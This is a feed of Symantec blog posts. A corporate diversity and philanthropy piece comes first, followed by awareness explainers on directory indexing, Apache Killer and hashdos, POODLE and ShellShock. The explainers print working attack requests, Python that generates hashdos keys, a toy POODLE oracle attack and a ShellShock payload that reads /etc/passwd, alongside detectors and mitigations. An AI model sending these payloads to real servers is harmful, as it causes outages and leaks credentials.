Channel: Symantec Connect - Blog entries

Giving and Receiving: Where Philanthropy and Corporate Value Intersect

Conference Board, Giving Thoughts Series

This blog was originally posted on The Conference Board's Giving Thoughts series on May 24, 2016.

Symantec’s vision is to make the world a safer place, and to accomplish this we need a team with the diversity of expertise and experience to protect against threats, both known and unknown. I believe that diversity helps us understand our customers better, enables us to respond to trends more quickly, and stimulates innovation. This is why we’ve made investing in diversity—both internally and more broadly in society through our philanthropic partnerships—a priority at Symantec, not just because it’s the right thing to do, but because it directly translates to a higher performing industry, company and bottom line.

According to Gallup, organizations with inclusive cultures report 27 percent higher profitability than those without, and McKinsey's recent Diversity Matters report found that ethnically and gender-diverse teams give companies more problem-solving tools, broader thinking, and better solutions, sparking innovation across the company.

The intersection of philanthropy and diversity efforts

A diverse workforce is rooted in a consistent, growing pipeline of qualified candidates. However, this doesn’t happen overnight and it most certainly doesn’t happen solely within the confines of our business. We need to reach outside our walls and into the communities where we live and work, to drive change that will not only benefit Symantec, but the industry and society as a whole.

This is where philanthropy becomes a crucial piece of the puzzle. I have always felt strongly that our philanthropic investments can be a powerful tool for translating a diversity strategy into tangible results. Targeted, strategic philanthropy should align with and support our business. When aligned with diversity goals and metrics, philanthropy allows us to build relationships with key influencers and leading nonprofit organizations that are at the forefront of championing equity. We learn from these partnerships—where the gaps are, how we can more effectively reach diverse communities, what we can be doing within our own company to build a culture that’s more diverse and inclusive.

This intersection of philanthropy and diversity supports our diversity strategy, which is focused on attracting and retaining diverse talent, building an inclusive culture where that talent can thrive, and engaging with stakeholders to drive social impact—such as gender equity and equal access to STEM/cybersecurity education.

We believe in leveraging our philanthropic dollars to partner with thought leaders on diversity. We are a founding signatory of the Women's Empowerment Principles (WEP), a partnership initiative of UN Women and the UN Global Compact (UNGC) that is globally recognized as the standard set of principles for women's equality. In 2012 our CEO endorsed the WEP, and since then we have made strides toward implementing the principles and promoting equality for women. We grew the representation of women on our Board of Directors from 10 percent to 30 percent, and we now have 30 percent female representation in our C-suite as well. We also set public-facing goals to increase the percentage of women in our leadership. The WEP has given us a framework for integrating gender equity more fully into and across our business.

We also help to advance public policy initiatives that support equity and human rights. While we have been recognized by the Human Rights Campaign (HRC) as a "Best Place to Work for LGBT Equality" for eight consecutive years, it is really our partnership with the HRC that has guided us in creating a more inclusive culture and becoming public advocates of LGBT equality, supporting initiatives such as The Equality Act and, most recently, signing on to HRC's letter against North Carolina's recent law affecting the LGBT community. Additionally, we partner with nonprofits that promote the inclusion of more women in the technology field, such as the Anita Borg Institute and Lesbians Who Tech, an organization that celebrates the most innovative technology coming out of the lesbian community.

REAL Program

Net Impact is a nonprofit which mobilizes new generations to use their skills and careers to drive transformational social and environmental change. (As a side note, I would like to say that if I had the opportunity to belong to Net Impact when I was in college or graduate school I would have discovered much earlier in my career the importance of a career with purpose.)

We have partnered with Net Impact on the creation of the Racial Equity Awareness Leadership (REAL) Program. This scalable effort on race equity has a goal to institutionalize racial equity at colleges and universities through training and curriculum, and also create an inspired and equipped cohort of REAL student leaders to serve as peer-to-peer racial equity champions. Symantec has also provided a grant to Net Impact to further the growth of their chapters at undergraduate colleges and universities, with a focus on Historically Black Colleges and Universities (HBCUs), supporting the case for the crucial role that the HBCU community can play in addressing the racial inequities and barriers still in existence in the business world today.

Symantec Cyber Career Connection

A final great example of how philanthropy and diversity can come together to create shared value—and one that I am especially proud of—is our signature program, Symantec Cyber Career Connection (SC3). This initiative in collaboration with Symantec, the Symantec Foundation, nonprofit partners, and global companies is focused on building a pipeline of more diverse talent.  SC3 addresses the global shortage of cybersecurity professionals and the lack of diversity in the cybersecurity profession by providing underrepresented young adults and veterans the preparation and training they need to enter into cybersecurity careers.

In its first year, SC3 moved graduates into internships and full-time jobs at companies including Symantec, KPMG, Bank of America and Morgan Stanley, as well as improving diversity in the cybersecurity field, with 96 percent of graduates from the program being people of color and 38 percent female.

These are just a few of the ways I believe philanthropy and diversity have collaborated to produce important outcomes for Symantec and society. My hope is that the ongoing integration of our corporate diversity and philanthropic strategies will continue to strengthen our position in the marketplace and increase our impact externally more effectively than either can achieve alone.

More about the intersection of corporate philanthropy and diversity and inclusion

This post responds to The Conference Board's recent report Better Together: Why a United Front Can Propel Diversity and Inclusion and Corporate Philanthropy in the United States. The report is available free to members of The Conference Board.

About the author:


Cecily Joseph
Vice President of Corporate Responsibility and Chief Diversity Officer Symantec Corporation

Cecily Joseph is vice president of corporate responsibility and chief diversity officer for Symantec Corporation, a global leader in cybersecurity. As leader of Symantec’s corporate responsibility efforts, Cecily drives environmental, social and governance program development and integration. As Chief Diversity Officer, she is an ongoing champion for diversity & inclusion, pioneering numerous initiatives to increase diversity and equity within Symantec and the technology sector.


Unintended file exposure and directory indexing (CWE-425, CWE-548) explained

This blog series introduces vulnerabilities in websites and in the web applications running on them, with the aim of raising awareness.

This entry covers information leakage caused by "directory indexing", a problem that has been occurring since the early days of the web and continues today.

Note: the content was reviewed by Hiroshi Tokumaru of HASH Consulting Corporation.

+++++++++++++++++++++++++++++++++++++++++++++++

Unintended file exposure and directory indexing (CWE-425, CWE-548)

■Overview

Directory indexing (directory listing) is a standard web server feature: when the URL path names a directory rather than a file, the server displays the names of the files in that directory. On a site whose purpose is distributing software downloads, for example, this is convenient: the file list is generated automatically and each file can be downloaded without anyone writing an HTML index by hand.

However, if a file containing secret information has been carelessly placed in the web server's public area, directory indexing reveals its name to the outside world, and the secret leaks.

■Attack scenario and impact

Suppose a site provides bulletin board software at http://example.jp/bbs.php and has directory indexing enabled. Browsing http://example.jp/ then produces a page like the following.

Index of /

  • bbs.db
  • bbs.php
  • data/
  • dbconnect.php

[remainder omitted]

The listing shows a file called bbs.db, which is the bulletin board's database file (SQLite format). Simply clicking the bbs.db link downloads the whole database, and the secret information it contains, such as users' personal data, leaks out with no further effort.

■Impact of the vulnerability

Directory indexing itself is not a vulnerability; the vulnerability is that a file never intended to be public was placed in the public area. Even with directory indexing disabled, a secret file in the public area can still be found by guessing its name, for example with a dictionary attack.

There was also a past incident in which the answer key PDF for a national certification exam was downloaded before the exam took place. The PDF had been uploaded to the web server ahead of time, with the link to it published only at release time; because the file was named according to the same rule every year, the naming pattern was worked out and the file fetched early. The root cause was placing a file that should never have been public on the web server at all.

The impact of this vulnerability is:

  • Leakage of sensitive information

■How to check for the vulnerability

Check the following:

  • No files containing secret information are present in the web-published area
  • Directory indexing is disabled (unless it is enabled on purpose)

A procedure for diagnosing from the outside whether directory indexing is enabled is given in the "Web Health Check Specification" (ウェブ健康診断仕様), a supplement to IPA's "How to Secure Your Web Site" (安全なウェブサイトの作り方).

■Countermeasures

Take the following measures:

  • Do not place files containing secret information in the web-published area
  • Disable directory indexing

To disable directory indexing in Apache, remove the Indexes option (the "-Indexes" form below) in httpd.conf or the relevant configuration file:

<Directory "/var/www/html">
    Options -Indexes
</Directory>

Note that a later <Directory> or <Location> section, or a .htaccess file, containing Options +Indexes switches the listing back on; if .htaccess files are in use, restrict this with AllowOverride so that Options cannot be overridden there. Other servers have an equivalent switch (for example nginx's autoindex directive, which is off by default).
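The two checks above can be automated. The following is an added example, not code from the original post: parse_index_page() recognises an Apache mod_autoindex style "Index of" page and extracts the listed names, flag_sensitive() picks out names that look like database, backup, configuration or repository files (which should never sit in the document root), and scan_docroot() applies the same rule to a directory on disk. The sample listing, the pattern list and the throwaway document root are constructed for the example; extend SENSITIVE_PATTERNS to match your own environment.

```python
"""Detect directory listings and files that should not be in a document root.
Added example; sample data and the pattern list are constructed here."""
import os
import re
import tempfile
from html.parser import HTMLParser
from pathlib import Path

# Names that usually mean "not meant to be served" (our list, not an official one).
SENSITIVE_PATTERNS = [re.compile(p, re.IGNORECASE) for p in (
    r"\.(db|sqlite3?|sql|bak|old|orig|swp|log|ini|env|key|pem)$",  # data, backups, secrets
    r"~$",                                                         # editor backup: dbconnect.php~
    r"^\.(git|svn|hg|htpasswd)$",                                  # repo metadata, password file
)]

class _IndexParser(HTMLParser):
    """Collect the <title> and the href of every entry link in a listing page, skipping
    mod_autoindex's sort links (?C=...), the parent-directory link and absolute URLs."""
    def __init__(self):
        super().__init__()
        self.title, self._in_title, self.entries = "", False, []

    def handle_starttag(self, tag, attrs):
        if tag == "title":
            self._in_title = True
        elif tag == "a":
            href = dict(attrs).get("href") or ""
            if href and not href.startswith(("?", "/", "../", "http://", "https://")):
                self.entries.append(href)

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False

    def handle_data(self, data):
        if self._in_title:
            self.title += data

def parse_index_page(html: str):
    """Return the listed names if `html` is a directory listing, otherwise None."""
    p = _IndexParser()
    p.feed(html)
    return p.entries if p.title.strip().startswith("Index of") else None

def flag_sensitive(names):
    """Subset of `names` that match SENSITIVE_PATTERNS (trailing '/' of directories ignored)."""
    return [n for n in names if any(rx.search(n.rstrip("/")) for rx in SENSITIVE_PATTERNS)]

def scan_docroot(root: str):
    """Paths under `root` (relative, sorted) whose names match SENSITIVE_PATTERNS."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            if any(rx.search(name) for rx in SENSITIVE_PATTERNS):
                hits.append(os.path.relpath(os.path.join(dirpath, name), root))
    return sorted(hits)

# Constructed: what http://example.jp/ returns in the scenario above.
SAMPLE_LISTING = """<html><head><title>Index of /</title></head><body>
<h1>Index of /</h1><ul>
<li><a href="/"> Parent Directory</a></li>
<li><a href="?C=N;O=D"> Name</a></li>
<li><a href="bbs.db"> bbs.db</a></li>
<li><a href="bbs.php"> bbs.php</a></li>
<li><a href="data/"> data/</a></li>
<li><a href="dbconnect.php"> dbconnect.php</a></li>
</ul></body></html>"""

def demo_docroot():
    """Build a throwaway document root like the one in the scenario and scan it."""
    with tempfile.TemporaryDirectory() as root:
        (Path(root) / "data").mkdir()
        for name in ("bbs.db", "bbs.php", "dbconnect.php", "dbconnect.php~", "data/posts.sqlite"):
            (Path(root) / name).touch()
        return scan_docroot(root)

if __name__ == "__main__":
    print("listed:", parse_index_page(SAMPLE_LISTING))
    print("exposed:", flag_sensitive(parse_index_page(SAMPLE_LISTING)))
    print("on disk:", demo_docroot())
```

The disk scan is the more important of the two: it finds files such as dbconnect.php~ (an editor backup that Apache serves as plain text, source included) whether or not directory indexing is enabled, which is exactly the "disabled indexing is not enough" point made above.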

■References

Web Health Check Specification (supplement to How to Secure Your Web Site), IPA

https://www.ipa.go.jp/security/vuln/websecurity.html

Denial-of-service attacks that exploit middleware bugs

This blog series introduces vulnerabilities in websites and in the web applications running on them, with the aim of raising awareness.

This entry covers weaknesses that leave a server open to denial-of-service (DoS) attacks based on bugs in middleware.

Note: the content was reviewed by Hiroshi Tokumaru of HASH Consulting Corporation.

+++++++++++++++++++++++++++++++++++++++++++++++

Denial-of-service attacks that exploit middleware bugs

■Overview

A denial-of-service (DoS) attack sends crafted requests, or simply a very large number of requests, to a server in order to slow it down or, in some cases, stop it altogether. A DoS attack does not normally leak information or tamper with data, although depending on how the server goes down, files may end up partially corrupted.

Many common DoS techniques abuse properties of the network, but there are also attacks that exploit bugs in middleware or in the application. Two examples are Apache Killer (CVE-2011-3192), which exploits a bug in Apache HTTP Server, and hashdos (CVE-2011-4885 and related CVEs), which exploits a weakness in the hash-table implementations of language runtimes such as PHP and Java.

■Attack scenario and impact

Below is the HTTP request that Apache Killer sends (abbreviated). The distinctive part is the Range header.

GET / HTTP/1.1
Host: example.jp
Range: bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,5-10,5-11,5-12,5-13,5-14,5-15,5-16,5-17,5-18,5-19,5-20,5-21,5-22,5-23,5-24,5-25,5-26,5-27,5-28,5-29,5-30,5-31,5-32, [...] 5-1281,5-1282,5-1283,5-1284,5-1285,5-1286,5-1287,5-1288,5-1289,5-1290,5-1291,5-1292,5-1293,5-1294,5-1295,5-1296,5-1297,5-1298,5-1299

When a vulnerable Apache receives this request, both CPU and memory consumption balloon as it assembles a multipart response for more than a thousand overlapping ranges, and memory and CPU capacity are exhausted. Memory exhaustion on Linux triggers the OOM killer, which starts terminating the processes that use the most memory. The OOM killer does not weigh how important a process is to the service, so processes the site depends on, such as the database server, can be killed too, and the web server stops functioning.

Below is an example hashdos request against PHP.

POST /phpinfo.php HTTP/1.1
Host: example.jp
Content-Type: application/x-www-form-urlencoded
Content-Length: 1441792

EzEzEzEzEzEzEzEz=&EzEzEzEzEzEzEzFY=&EzEzEzEzEzEzEzG8=&EzEzEzEzEzEzEzH%17=&EzEzEzEzEzEzFYEz=&EzEzEzEzEzEzFYFY=&EzEzEzEzEzEzFYG8=&EzEzEzEzEzEzFYH%17=&EzEzEzEzEzEzG8Ez=&EzEzEzEzEzEzG8FY=&EzEzEzEzEzEzG8G8=&EzEzEzEzEzEzG8H%17=&EzEzEzEzEzEzH%17Ez=& [remainder omitted]

When PHP accepts this request, storing the parameters in its internal associative array (a hash table) takes an abnormally long time: every key has been chosen to hash to the same bucket, so each insertion has to walk the whole chain of keys already stored, and the total work grows with the square of the number of parameters. In the meantime no new requests are served. Unlike Apache Killer, memory is not exhausted, so the server recovers as soon as the attack stops.
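Why those particular keys, and how a proxy or log scanner can spot both requests before they reach the application: the following is an added example, not code from the original post. djbx33a() is the hash PHP 5.3 used for array keys (h = h*33 + c, starting at 5381); the two-byte chunks Ez, FY, G8 and H\x17 all satisfy c1*33 + c2 = 2399, so any concatenation of them hashes identically, and 4^8 = 65536 sixteen-byte keys come out with one hash. The two detection thresholds are the ones used in the vendors' mitigations (the Apache advisory's rewrite rule allows at most five ranges; PHP 5.3.9's max_input_vars defaults to 1000); whether they suit your site is an assumption. All request data is constructed here.

```python
"""hashdos key construction and request-level checks for Apache Killer and hashdos.
Added example; all request data is constructed."""
import re
from itertools import product
from urllib.parse import parse_qsl, quote_from_bytes

def djbx33a(key: bytes) -> int:
    """DJBX33A as PHP (< 5.3.9) hashed array keys: h = h*33 + c, starting at 5381."""
    h = 5381
    for c in key:
        h = (h * 33 + c) & 0xFFFFFFFFFFFFFFFF   # unsigned long on a 64-bit build
    return h

# Two-byte chunks with c1*33 + c2 == 2399; each hashes to the same value.
COLLIDING_CHUNKS = [b"Ez", b"FY", b"G8", b"H\x17"]

def hashdos_keys(chunks=COLLIDING_CHUNKS, key_len=16):
    """Concatenating colliding chunks preserves the collision: len(chunks)**(key_len/2) keys."""
    return [b"".join(p) for p in product(chunks, repeat=key_len // len(chunks[0]))]

def distinct_hashes(keys) -> int:
    return len({djbx33a(k) for k in keys})

def build_hashdos_body(keys) -> str:
    """The urlencoded POST body shown above: key=&key=&... (0x17 appears as %17)."""
    return "&".join(quote_from_bytes(k) + "=" for k in keys)

# --- Apache Killer: count the ranges in a Range header -----------------------
def count_ranges(range_header: str) -> int:
    m = re.match(r"^\s*bytes=(.*)$", range_header, re.IGNORECASE)
    if not m:
        return 0
    return sum(1 for r in m.group(1).split(",") if r.strip())

def is_apache_killer_range(range_header: str, max_ranges: int = 5) -> bool:
    """The Apache advisory's mod_rewrite mitigation allows at most five ranges per request."""
    return count_ranges(range_header) > max_ranges

# --- hashdos: count form fields before they reach the application -------------
def count_form_fields(body: str) -> int:
    return len(parse_qsl(body, keep_blank_values=True))

def is_hashdos_body(body: str, max_input_vars: int = 1000) -> bool:
    """PHP 5.3.9 introduced max_input_vars with a default of 1000; same limit here."""
    return count_form_fields(body) > max_input_vars

if __name__ == "__main__":
    keys = hashdos_keys()
    print(len(keys), "keys,", distinct_hashes(keys), "distinct hash value(s)")
    print("body length:", len(build_hashdos_body(keys)))
    print("ranges in Apache Killer header:",
          count_ranges("bytes=0-," + ",".join(f"5-{i}" for i in range(1300))))
```

The generated body starts with exactly the parameter names shown in the request above, and its length is 1441791 bytes, one byte short of the Content-Length in the post. A practitioner would apply count_ranges() and count_form_fields() at a reverse proxy or WAF, where a rejected request costs nothing, rather than inside the vulnerable runtime.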

■Impact of the vulnerability

Examples of the impact of a DoS attack:

  • Slow server response
  • No new requests accepted
  • Abnormal termination of the server

■How to check for the vulnerability

The Vulnerability Assessment service included at no charge with Symantec SSL server certificates can detect the Apache Killer and hashdos vulnerabilities.

If a vulnerability scanner or assessment service like that is not available, check whether the installed versions of Apache, PHP and so on already contain the fix.

Versions affected by Apache Killer: Apache HTTP Server 2.2.0 to 2.2.20 (the Apache advisory also lists the 1.3 and 2.0 branches as affected)

Affected by hashdos:

ASP.NET   without MS11-100 applied
Tomcat    5.5.34 and earlier, 6.0.34 and earlier, 7.0.22 and earlier
Ruby      1.8.7-p352 and earlier
PHP       5.3.8 and earlier

■Countermeasures

Upgrade the affected software to a fixed version or apply the vendor patch.

Both Apache Killer and hashdos also have mitigations. If for some reason the patch cannot be applied, the mitigation reduces the damage an attack can do: for Apache Killer, the Apache advisory gives mod_rewrite and SetEnvIf rules that drop or reject requests carrying more than a handful of ranges; for hashdos, PHP 5.3.9 added the max_input_vars setting (default 1000) to cap the number of request parameters, and limiting the POST body size has a similar effect. See the references for details.

Symantec Cloud-based WAF (シマンテック クラウド型WAF) can also block attacks on websites through vulnerabilities such as Apache Killer and hashdos.

■参考文献

Security alerts from the Information-technology Promotion Agency, Japan (IPA)

https://www.ipa.go.jp/security/ciadr/vul/20110831-apache.html

https://www.ipa.go.jp/security/ciadr/vul/20120106-web.html

Advisory on the Apache HTTP Server site (English)

http://httpd.apache.org/security/CVE-2011-3192.txt

POODLE (Padding Oracle On Downgraded Legacy Encryption; CVE-2014-3566) explained

This blog series introduces vulnerabilities in websites and in the web applications running on them, with the aim of raising awareness.

This entry covers POODLE (Padding Oracle On Downgraded Legacy Encryption; CVE-2014-3566), a vulnerability in SSL 3.0.

Note: the content was reviewed by Hiroshi Tokumaru of HASH Consulting Corporation.

+++++++++++++++++++++++++++++++++++++++++++++++

POODLE (Padding Oracle On Downgraded Legacy Encryption; CVE-2014-3566)

■Overview

SSL (Secure Sockets Layer) has long been widely used as the encryption protocol for communication on the Internet. In October 2014, Google's security team published an efficient way to decrypt traffic protected by SSL 3.0, the last version of SSL (its successors are TLS 1.0 and later), and named it POODLE (Padding Oracle On Downgraded Legacy Encryption). The "downgraded" in the name refers to the fact that many clients retry with SSL 3.0 when a TLS handshake fails, so an attacker on the network path can push even a TLS-capable client and server down to SSL 3.0. Using POODLE, part of an HTTPS exchange carried over SSL 3.0 can be decrypted.

■Attack scenario and impact

SSL 3.0 allows a block cipher in CBC mode to be selected; encryption then proceeds in blocks of a fixed length. Because the data is not necessarily a multiple of the block length, the remaining space in the last block is filled with dummy bytes called padding. The SSL 3.0 specification does not require the contents of the padding to be checked (only the final length byte is examined), so by manipulating the ciphertext an attacker can recover one byte of data with probability 1/256 per request, that is, about 256 requests per byte on average. Repeating this yields several dozen bytes of data. Cookies and HTTP Basic authentication passwords are the targets.

As a precondition for POODLE, the attacker must be able to make the user's client send requests of the attacker's choosing (for example through JavaScript served from an HTTP page the user visits) and must sit between client and server so as to modify the traffic. HTTP lends itself to this. Protocols other than HTTP, such as mail or database protocols, are not affected by POODLE in practice.
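The 1/256-per-request mechanism is easier to see in code than in prose. The following is an added example, not code from the original post or from the POODLE paper: a toy 16-byte Feistel block cipher stands in for AES (assumption: any block cipher in CBC mode behaves the same for this attack), records follow the SSL 3.0 layout (data, then MAC, then padding of which only the final length byte is checked), and each record gets a fresh random IV rather than SSL 3.0's chained IV (an assumption that does not change the attack). The server's accept/reject answer is the oracle; the secret cookie, the keys and the attacker's filler bytes are constructed here.

```python
"""POODLE in miniature: SSL 3.0 padding check as an oracle over CBC ciphertext.
Added example with a toy block cipher; nothing here talks to a real network."""
import hashlib
import hmac
import os

BLOCK = 16
MAC_LEN = 20  # HMAC-SHA1 output, as in SSL 3.0 cipher suites using SHA-1

def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def _round(key: bytes, i: int, half: bytes) -> bytes:
    return hmac.new(key, bytes([i]) + half, hashlib.sha256).digest()[:8]

def toy_encrypt_block(key: bytes, block: bytes) -> bytes:
    """Four-round Feistel network over two 8-byte halves: a toy but invertible block cipher."""
    l, r = block[:8], block[8:]
    for i in range(4):
        l, r = r, _xor(l, _round(key, i, r))
    return l + r

def toy_decrypt_block(key: bytes, block: bytes) -> bytes:
    l, r = block[:8], block[8:]
    for i in reversed(range(4)):
        l, r = _xor(r, _round(key, i, l)), l
    return l + r

def cbc_encrypt(key: bytes, iv: bytes, pt: bytes) -> bytes:
    out, prev = [], iv
    for i in range(0, len(pt), BLOCK):
        prev = toy_encrypt_block(key, _xor(pt[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(key: bytes, iv: bytes, ct: bytes) -> bytes:
    out, prev = [], iv
    for i in range(0, len(ct), BLOCK):
        blk = ct[i:i + BLOCK]
        out.append(_xor(toy_decrypt_block(key, blk), prev))
        prev = blk
    return b"".join(out)

class Server:
    """Owns the keys and the secret cookie.  send() builds a record as the victim's browser
    would (attacker-chosen prefix and suffix around the cookie); receive() is the padding
    and MAC check whose accept/reject answer is the oracle."""

    def __init__(self, secret: bytes, tls_padding: bool = False):
        self.enc_key, self.mac_key, self.secret = os.urandom(16), os.urandom(16), secret
        self.tls_padding = tls_padding  # True: every padding byte must equal the length (TLS rule)

    def send(self, prefix: bytes, suffix: bytes) -> bytes:
        data = prefix + self.secret + suffix
        mac = hmac.new(self.mac_key, data, hashlib.sha1).digest()
        pad_len = BLOCK - 1 - (len(data) + MAC_LEN) % BLOCK   # SSL 3.0: filler bytes are arbitrary
        record = data + mac + bytes(pad_len) + bytes([pad_len])
        iv = os.urandom(BLOCK)
        return iv + cbc_encrypt(self.enc_key, iv, record)

    def receive(self, msg: bytes) -> bool:
        pt = cbc_decrypt(self.enc_key, msg[:BLOCK], msg[BLOCK:])
        pad_len = pt[-1]
        if pad_len >= BLOCK:
            return False
        if self.tls_padding and pt[-1 - pad_len:-1]!= bytes([pad_len]) * pad_len:
            return False
        body = pt[:len(pt) - pad_len - 1]
        data, mac = body[:-MAC_LEN], body[-MAC_LEN:]
        return hmac.compare_digest(hmac.new(self.mac_key, data, hashlib.sha1).digest(), mac)

def recover_secret(server: Server, secret_len: int, max_attempts: int = 256 * 64):
    """POODLE: for each cookie byte, choose a prefix length that puts it last in a block and a
    suffix length that makes the record end in a full padding block; then copy the target
    ciphertext block over the padding block and resend until the server accepts.  Acceptance
    means the decrypted last byte equalled BLOCK-1, which reveals the cookie byte; each try
    succeeds with probability 1/256 because the preceding ciphertext block changes per record."""
    recovered = bytearray()
    for j in range(secret_len):
        prefix = b"A" * ((BLOCK - 1 - j) % BLOCK)
        suffix = b"B" * (-(len(prefix) + secret_len + MAC_LEN) % BLOCK)
        target = (len(prefix) + j) // BLOCK + 1          # +1 because blocks[0] is the IV
        for _ in range(max_attempts):
            msg = server.send(prefix, suffix)
            blocks = [msg[i:i + BLOCK] for i in range(0, len(msg), BLOCK)]
            forged = b"".join(blocks[:-1]) + blocks[target]
            if server.receive(forged):
                recovered.append((BLOCK - 1) ^ blocks[target - 1][-1] ^ blocks[-2][-1])
                break
        else:
            return None   # never accepted: e.g. the TLS-style full padding check
    return bytes(recovered)

if __name__ == "__main__":
    print(recover_secret(Server(b"SID=4"), 5))
```

With tls_padding=True the same server rejects every forged record, because TLS requires all pad_len bytes of padding to carry the value pad_len and a copied block satisfies that with negligible probability; that single specification difference is the whole reason SSL 3.0 is affected and TLS 1.0 is not.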

■Impact of the vulnerability

The impact of this vulnerability is that part of the communication may be disclosed to a third party. Typical consequences are impersonation through a leaked cookie, or unauthorised login through a leaked Basic authentication ID and password.

Given the nature of the attack, encrypted traffic of protocols other than HTTP, such as mail, cannot be decrypted. Sites that use neither cookies nor HTTP authentication (Basic or Digest) are considered less exposed.

■How to check for the vulnerability

A web server can be checked for POODLE by testing whether SSL 3.0 is enabled. For example, in Windows Internet Options, on the Advanced tab, enable "Use SSL 3.0" and disable all other SSL and TLS versions, then open the target site over HTTPS in Internet Explorer (IE). If the page loads normally, SSL 3.0 is enabled and the site is affected by POODLE. From a command line, openssl s_client -connect example.jp:443 -ssl3 performs the same test, provided your OpenSSL build still includes SSL 3.0 support: a completed handshake means SSL 3.0 is enabled.

Be sure to restore the Internet Options settings after the check.

■Countermeasures

POODLE is a flaw in the protocol itself rather than a bug in any program, so it cannot be fundamentally fixed by applying patches. A website affected by POODLE stops being affected once SSL 3.0 is disabled and only TLS is enabled. Where SSL 3.0 cannot be removed yet, supporting TLS_FALLBACK_SCSV (RFC 7507) on both server and client prevents the forced downgrade from TLS to SSL 3.0, but disabling SSL 3.0 is the proper fix.

Symantec Cloud-based WAF (シマンテック クラウド型WAF) can also protect websites against POODLE attacks.

■参考文献

Update: Countermeasures for the SSL 3.0 vulnerability (CVE-2014-3566)

JVNDB-2014-004670 Vulnerability in the SSL protocol used by OpenSSL and other products that allows plaintext data to be obtained

http://jvndb.jvn.jp/ja/contents/2014/JVNDB-2014-004670.html

JVNVU#98283300 Vulnerability in the SSLv3 protocol that allows encrypted data to be decrypted (POODLE attack)

https://jvn.jp/vu/JVNVU98283300/index.html

ShellShock (CVE-2014-6271) explained

This blog series introduces vulnerabilities in websites and in the web applications running on them, with the aim of raising awareness.

This entry covers the vulnerability in GNU Bash published in September 2014, known as ShellShock.

Note: the content was reviewed by Hiroshi Tokumaru of HASH Consulting Corporation.

+++++++++++++++++++++++++++++++++++++++++++++++

ShellShock (CVE-2014-6271)

■Overview

On Unix and Linux systems, a shell is the program that interprets and executes the user's commands. Among shells, Bash is the most widely used, being the default on Linux and Mac OS X.

Like other shells, Bash is programmable, and it allows function definitions to be supplied from outside through environment variables. This feature had a flaw: when Bash imported such a function it kept parsing past the end of the function body and executed whatever followed, so arbitrary commands placed in an environment variable by an outsider ran as soon as Bash started.

The typical way an outsider can set environment variables for Bash is through a CGI program, but several other routes have been pointed out, such as mail delivery, and attacks have continued actively since September.

■Attack scenario and impact

Suppose a CGI program written in Perl sends mail with the following line. The program takes no external parameters, so at first sight there is nothing to attack.

system('/usr/sbin/sendmail admin@example.jp < mail.txt');

However, invoking this CGI program with the browser's User-Agent header set as follows is enough to carry out an attack.

() { :;}; /bin/cat /etc/passwd

HTTP headers such as User-Agent are passed to a CGI program through environment variables (User-Agent becomes HTTP_USER_AGENT). When the CGI program runs the sendmail command, Perl's system function starts a shell to run it, because the command string contains shell metacharacters. On systems where /bin/sh is Bash, the environment variable is imported as a function definition and the command after it runs, so the request above prints the contents of /etc/passwd:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
[remainder omitted]
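The header-to-environment step and a detector for the probes it enables, as an added example (not code from the original post): cgi_environment() applies the CGI rule for turning request headers into HTTP_* variables (RFC 3875, section 4.1.18), suspicious_cgi_vars() names the variables a vulnerable Bash would import as functions, and scan_access_log() runs the same test over Apache combined-format access log lines. The regular expression, the assumed log format and the sample log lines are ours.

```python
"""CGI header mapping and a ShellShock probe detector for headers and access logs.
Added example; regex, log format assumption and sample lines are constructed."""
import re

def cgi_environment(headers: dict) -> dict:
    """HTTP header 'User-Agent' becomes HTTP_USER_AGENT, as a CGI gateway does."""
    return {"HTTP_" + name.upper().replace("-", "_"): value for name, value in headers.items()}

# Vulnerable bash treated any variable whose value starts with "() {" as a function
# definition.  Attackers vary the whitespace, so allow for it (our own pattern).
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")

def is_shellshock_payload(value: str) -> bool:
    return bool(SHELLSHOCK_RE.search(value))

def suspicious_cgi_vars(headers: dict) -> list:
    """Names of the CGI variables a vulnerable bash would import as functions."""
    return sorted(k for k, v in cgi_environment(headers).items() if is_shellshock_payload(v))

# Apache 'combined' LogFormat: client ident user [time] "request" status size "referer" "user-agent"
APACHE_COMBINED = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)" \d{3} \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

def scan_access_log(lines) -> list:
    """(client, request line) for entries whose Referer or User-Agent carries the marker."""
    hits = []
    for line in lines:
        m = APACHE_COMBINED.match(line)
        if m and (is_shellshock_payload(m["referer"]) or is_shellshock_payload(m["ua"])):
            hits.append((m["client"], m["request"]))
    return hits

# Constructed sample: a probe in User-Agent, a benign request, a probe in Referer.
SAMPLE_LOG = [
    '203.0.113.5 - - [25/Sep/2014:10:00:01 +0900] "GET /cgi-bin/form.cgi HTTP/1.1" 200 512 "-" "() { :;}; /bin/cat /etc/passwd"',
    '198.51.100.7 - - [25/Sep/2014:10:00:02 +0900] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [25/Sep/2014:10:00:03 +0900] "GET /cgi-bin/form.cgi HTTP/1.1" 200 512 "() { ignored; }; /usr/bin/id" "curl/7.37.0"',
]

if __name__ == "__main__":
    print(suspicious_cgi_vars({"User-Agent": "() { :;}; /bin/cat /etc/passwd", "Host": "example.jp"}))
    for client, request in scan_access_log(SAMPLE_LOG):
        print(client, request)
```

Treat a match as a triage signal rather than proof of compromise: a JavaScript fragment in a Referer also matches "() {", and a probe against a host whose Bash is patched does nothing (patched Bash only imports functions from specially named BASH_FUNC_* variables). Conversely, headers other than User-Agent and Referer (Cookie, Host, any custom header) reach CGI the same way, so a log format that records only those two will miss probes sent elsewhere.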

■Impact of the vulnerability

Examples of the impact include, but are not limited to:

  • Leakage of secret information
  • Tampering with data
  • Use of the server as a stepping stone for attacks on other sites

■How to check for the vulnerability

Run the following at a Bash prompt:

$ env x='() { :;}; echo this bash is vulnerable' bash -c :

If the following is printed, the Bash in use has the ShellShock vulnerability:

this bash is vulnerable

■Countermeasures

